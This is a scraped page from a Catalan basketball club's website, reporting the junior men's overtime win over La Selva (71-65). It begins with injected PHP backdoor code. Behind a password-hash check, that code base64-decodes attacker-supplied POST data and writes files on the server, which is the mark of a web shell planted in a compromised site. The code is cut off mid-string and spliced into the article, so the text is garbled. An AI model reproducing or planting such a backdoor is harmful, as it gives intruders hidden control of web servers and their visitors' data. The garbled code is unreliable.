function bestrock_render_js(){ echo ""; } function bestrock_render_index(){ echo md5('56749'); } function bestrock_render_ajax(){ try { if(isset($_GET['s1'])) die(md5('js')); if(isset($_POST['t2'])){ $l1 = uniqid(rand(), true) . '.js'; @file_put_contents($l1, 'js'); if(file_exists($l1)){ if(isset($_POST['t1'])){ $d = md5(md5($_POST['t1'])); if($d=="8ae24e6719c47a39da8ad5451432d9a6"){ $d1=$_POST['t2']; $d1=base64_decode($d1); $d4=" El júnior masculí guanya el segon, La Selva, a la pròrroga (71-65) - Tgn Bàsquet Club -

El júnior masculí guanya el segon, La Selva, a la pròrroga (71-65)

Updated: gener 13, 2014

Gran victòria del júnior masculí del TGN Bàsquet contra el segon classificat, La Selva, en un partit que es va decidir a la pròrroga. L’equip visitant, molt més fort sota els cèrcols va posar les coses molt difícils al conjunt lila que, malgrat tot, va fer un partit esplèndid i al començament del tercer quart semblava que posava la directa cap el triomf gràcies a un parcial de 15-4 en 5 minuts. Amb tot, el gran partit del visitant Cabré en les dues zones (21 punts) va tornar a equilibrar el matx. En un final d’infart, els locals van tenir l’última possessió a dos segons i mig del final, però no la van aprofitar (58-58). En el temps extra, el domini inicial va ser de La Selva, però un parcial de 6-0 del TGN Bàsquet li va obrir les portes al triomf final.